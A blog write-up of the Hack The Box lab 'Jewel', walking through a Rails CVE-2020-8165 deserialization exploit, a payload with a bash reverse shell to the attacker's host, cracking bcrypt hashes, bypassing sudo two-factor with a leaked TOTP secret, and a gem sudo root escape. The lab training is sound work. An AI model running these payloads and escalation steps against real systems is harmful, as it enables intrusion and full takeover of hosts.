24th October 2021
Hack The Box Jewel Write-Up by T13nn3s

Hack The Box – Jewel – 10.10.10.211

Experience is a jewel, and it need be so, for it is often purchased at an infinite rate.

William Shakespeare

About Jewel

In this post, I’m writing a write-up for the machine Jewel from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Jewel is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15, and submitting the root flag you points will be raised by 30.

Foothold
The Nmap port scan had discovered three open ports. The two ports which are interesting are 8000/tcp and 8080/tcp, both ports are servicing a web service. After checking the web services and found in the Gitweb log that the backend is using Rails version 2.1.1. This version has a vulnerability, also known as CVE-2020-8165.

User
After exploiting the vulnerability, I was able to establish a reverse shell as the user bill, and I cloud directly read the user flag.

Root
The root part was the most interesting part of this machine, IMO. After the enumeration, I had found four bcrypt hashes. John was able to crack the password from the user bill, and the sudo -l command is asking for a verification code. Sudo is protected with second-factor authentication. From the home folder of the user bill, I had found the Google Authenticator file with the Secret. With this secret, I could configure the Google Authenticator for the second-factor verification. The code depends on the system time. After syncing my system time with the time of the box, the second-factor authentication with the provided code from the Google Authenticator works. The user account bill has permission to run gem as sudo. GTFObins was the solution to gain root privileges and read the root flag.

Machine Info

Hack The Box Jewel Write-Up by T13nn3s
Hack The Box Jewel Write-Up by T13nn3s
Hack The Box Jewel Machine IP and maker

Recon

Port scan

As always I start the box with a port scan with Nmap.

~$ nmap -sC -sV -oA ./nmap/10.10.10.211 10.10.10.211

The results.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-30 21:48 UTC
Nmap scan report for 10.10.10.211
Host is up (0.017s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: 10.10.10.211 Git
|_Requested resource was http://10.10.10.211:8000/gitweb/
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.59 seconds

This machine acts as a webserver. The interesting is the banner on the alternative HTTP port 8080. Phusion Passenger 6.0.6 and the directory /gitweb is visible.

Enumeration Webserver

I visited the URL http://10.10.10.211:8080 and landed the website BLOG! There is a Sign-Up and login button visible on the right top corner. So, let’s register a user account.

Hack The Box Jewel Webserver HTTP 8080
http://10.10.10.211

After~creating the account and logging in, there is nothing interesting to find. I found some articles and two usernames jennifer and bill. After clicking some around, I switched to the HTTP port, 8000. I visited the URL http://10.10.10.211:8000 and the page got’s redirected to http://10.10.10.211:8000/gitweb/.

I checked the used Gitweb version 2.20.1, which contains several vulnerabilities. I played some around with CVE-2019-19604, a OS command execution vulnerability. But I was not able to get this exploit working. I decided to look further for other attack vectors.

Hack The Box Jewel Gitweb webservice
https://10.10.10.211:8000/gitweb

After some searching and clicking around on this Gitweb page, I saw that Bill had placed a commit that changed 134 files, On September, 17th 2020. This commit has the name ‘initial commit’. After checking the log of this commit, I found some software versions listed in the contents of the files, like ‘ruby 2.5.5.’ and ‘rails .2.2.1’.

After a search on Google, I found that Rails 2.2.1 had a Remote Code Execution (RCE) vulnerability. The description of this vulnerability, according to Rapid7: ‘A deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.’

Intrusion

CVE-2020-8165

After some searching again on Google for a Proof-Of-Concept (PoC), I found one on Github. After carefully reading the payload, I found that this payload has a typo, there is an ‘=‘ missing to define the payload variable.

~$ git clone https://github.com/masahiro331/CVE-2020-8165.git
git clone https://github.com/masahiro331/CVE-2020-8165.git
Cloning into 'CVE-2020-8165'...
remote: Enumerating objects: 96, done.
remote: Counting objects: 100% (96/96), done.
remote: Compressing objects: 100% (74/74), done.
remote: Total 96 (delta 13), reused 88 (delta 9), pack-reused 0
Unpacking objects: 100% (96/96), 1.02 MiB | 1.33 MiB/s, done.
~$ bundle install --path vendor/bundle
~$ bundle exec rails db:migrate
~$ bundle exec rails s

Now access the rails console.

~$ sudo bundle exec rails console
Running via Spring preloader in process 17770
Loading development environment (Rails 5.2.3)

WARNING: This version of ruby is included in macOS for compatibility with legacy software. 
In future versions of macOS the ruby runtime will not be available by 
default, and may require you to install an additional package.

irb(main):001:0> code = '`/bin/bash -c "bash -i >& /dev/tcp/10.10.14.38/4444 0>&1"`'
irb(main):001:0> erb = ERB.allocate
irb(main):001:0> erb.instance_variable_set :@src, code
irb(main):001:0> erb.instance_variable_set :@filename, "1"
irb(main):001:0> erb.instance_variable_set :@lineno, 1
irb(main):001:0> payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
irb(main):001:0> puts "Payload"
irb(main):001:0>
irb(main):001:0> require 'uri'
irb(main):001:0> puts URI.encode_www_form(payload: payload)

After the last command, I got the payload. This is my payload.

%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%3F%60%2Fbin%2Fbash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.14.38%2F4444+0%3E%261%22%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T

The second step is to put this payload in an HTTP request and sent it to the webserver. Put payload through Burp Suite on the profile update page. The username in the request needs to be replaced with the payload.

Hack The Box Jewel Original HTTP request
Original HTTP request

Now, I replace my username with the payload and send the payload with the RCE to the webserver.

Hack The Box Jewel send RCE payload
Send payload to the webserver with reverse shell

The last step is going to the homepage, and the server is requesting my updated username with the reverse shell payload and the payload got’s executed.

Connection from 10.10.10.211:59414
bash: cannot set terminal process group (793): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~/blog$

The next step is to grab the user flag.

[email protected]:~/blog$ ls
ls
app
bd.sql
bin
config
config.ru
db
Gemfile
Gemfile.lock
lib
log
node_modules
package.json
public
Rakefile
README.md
storage
test
tmp
vendor
yarn.lock
[email protected]:~/blog$ cd /home     
cd /home
[email protected]:/home$ ls
ls
bill
[email protected]:/home$ cd bill
cd bill
[email protected]:~$ cat user.txt
cat user.txt
b3c76eb0ffdac2b874ffe75d4d6f0191
[email protected]:~$ 

Privilege Escalation

Enumeration

First, upgrade the shell and then I can start the enumeration for root. Let’s start the enumeration from the home folder of the user account Bill.

[email protected]:~/blog$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

When I run the command sudo -l, I need to fill in a password. I do not have the password so I left the password empty. The response from this box is quite fun. After filling in no password or the wrong password, the box is generating random messages. This what I need to keep in mind. When I have the password of bill, this command can be the next step.

I downloaded linpeas.sh to the machine and after running the script, it has found two password hashes. Let’s try to crack both of them with my little buddy John the Ripper.

[+] Searching specific hashes inside files - less false positives (limit 70)                                                                                                             
/var/backups/dump_2020-08-27.sql:$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO                                                                                            
/home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

The hashes are hashed with a bcrypt [Blowfish 32/64 X3]) hash, I have pasted the hashes in a file called hashes.txt. After more searching, I found another hash in the file /home/bill/blog/bd.sql and from the ‘http://10.10.10.211:8000/gitweb/?p=.git;a=patches’ file. I gave these hashes to john, and run them against the rockyou.txt wordlist.

$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW                                                                                         $2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW

After a couple of seconds, I got the password spongebob, after some testing, I found that this is the password for the user account bill.

~$ john hashes.txt -wordlist=../../wordlists/rockyou.txt
Loaded 4 password hashes with 4 different salts (bcrypt [Blowfish 32/64 X3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:35 0% 0g/s 2.425p/s 9.868c/s 9.868C/s naruto..sweety
spongebob        (?)

Now, I can run the sudo -l command, because I have the password.

[email protected]:~/blog$ sudo -l                   
sudo -l 
[sudo] password for bill: spongebob

Verification code:

Well, that’s interesting. It seems I need another step of verification.

Enumeration two-step verification

I need to find a way to get into the two-step verification. Most people are using Google Authenticator as second-factor authentication. So, let’s check if I can find something about Google. I checked the home folder of the user account bill and there is a file about the Google Authenticator.

~$ [email protected]:~$ ls -la
ls -la
total 52
drwxr-xr-x  6 bill bill 4096 Sep 17 14:10 .
drwxr-xr-x  3 root root 4096 Aug 26 09:32 ..
lrwxrwxrwx  1 bill bill    9 Aug 27 11:26 .bash_history -> /dev/null
-rw-r--r--  1 bill bill  220 Aug 26 09:32 .bash_logout
-rw-r--r--  1 bill bill 3526 Aug 26 09:32 .bashrc
drwxr-xr-x 15 bill bill 4096 Nov  5 21:41 blog
drwxr-xr-x  3 bill bill 4096 Aug 26 10:33 .gem
-rw-r--r--  1 bill bill   43 Aug 27 10:53 .gitconfig
drwx------  3 bill bill 4096 Nov  5 19:40 .gnupg
-r--------  1 bill bill   56 Aug 28 07:00 .google_authenticator
drwxr-xr-x  3 bill bill 4096 Aug 27 10:54 .local
-rw-r--r--  1 bill bill  807 Aug 26 09:32 .profile
lrwxrwxrwx  1 bill bill    9 Aug 27 11:26 .rediscli_history -> /dev/null
-r--------  1 bill bill   33 Nov  4 19:54 user.txt
-rw-r--r--  1 bill bill  116 Aug 26 10:43 .yarnrc

I have opened the file .google-authenticator and the secret is visible! With this secret, I’m able to configure the second-factor authentication.

[email protected]:~$ cat .google_authenticator
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH

I added the ‘Authenticator by mymindstorm‘ to my FireFox.

Hack The Box Jewel add two-factor authentication

After the configuration of the plugin with the Secret, I’m able to get the OTP from Google. I tried the code on the account from the user account bill, with the sudo -l command, but I received an error. Again, with a custom message.

[email protected]:~$ sudo -l
sudo -l
[sudo] password for bill: spongebob

Verification code: 699658

Error "Operation not permitted" while writing config
I don't wish to know that.

Own the machine

After doing some research, I found that the verification code get’s calculated by the time of the machine. So, the time of my machine needs to be in sync with the box. The box is using the ‘Europe/London’ timezone. after setting my machine in that timezone, I was able to enter the verification code correctly.

Matching Defaults entries for bill on jewel:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    insults

User bill may run the following commands on jewel:
    (ALL : ALL) /usr/bin/gem

Bill has the permissions to run gem as sudo. I know that GTFObins have some nice commands to break out the restricted environments: gem | GTFObins.

I ran this commando and was able to read the root flag.

[email protected]:~$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc                                 
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
# cat /root/root.txt
cat /root/root.txt
20e32770bb20e703e4149c4690431076

Many thanks again for reading!

Did you liked this write-up? Please consider to spend a respect point: https://app.hackthebox.eu/profile/224856.

Happy hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *